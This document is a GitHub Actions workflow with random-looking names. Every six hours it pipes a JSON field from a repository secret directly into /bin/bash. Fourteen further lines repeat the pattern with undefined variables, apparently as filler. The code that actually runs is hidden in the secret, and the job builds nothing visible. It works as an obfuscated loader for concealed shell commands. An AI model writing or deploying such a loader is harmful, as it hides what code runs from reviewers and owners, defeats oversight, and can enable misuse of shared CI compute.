name: wuguoduojian

on:
  workflow_dispatch:
  schedule:
    - cron: '56 5/6 * * *'

jobs:  # 7732
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wuguoduojian
        env:
          wv8782: ${{ secrets.wv8782 }}
        run: |
          echo $wv8782 | jq -r .zs6963 | /bin/bash
          echo $w89515 | jq -r .ijqnz82 | /bin/bash
          echo $iaem097 | jq -r .wwxyz57240 | /bin/bash
          echo $pfnke86 | jq -r .fxd1 | /bin/bash
          echo $g3103 | jq -r .kws434 | /bin/bash
          echo $tltrl830 | jq -r .qizxf6499 | /bin/bash
          echo $lv67 | jq -r .xiprv3808 | /bin/bash
          echo $lagn403 | jq -r .zznl64 | /bin/bash
          echo $mkotm32 | jq -r .sddy81430 | /bin/bash
          echo $xc6156 | jq -r .zuzjz62245 | /bin/bash
          echo $ldo2 | jq -r .f38 | /bin/bash
          echo $a4 | jq -r .ebnec2355 | /bin/bash
          echo $oj40 | jq -r .apw00 | /bin/bash
          echo $k789 | jq -r .jiagj58 | /bin/bash
          echo $plr07 | jq -r .hlmgz83 | /bin/bash

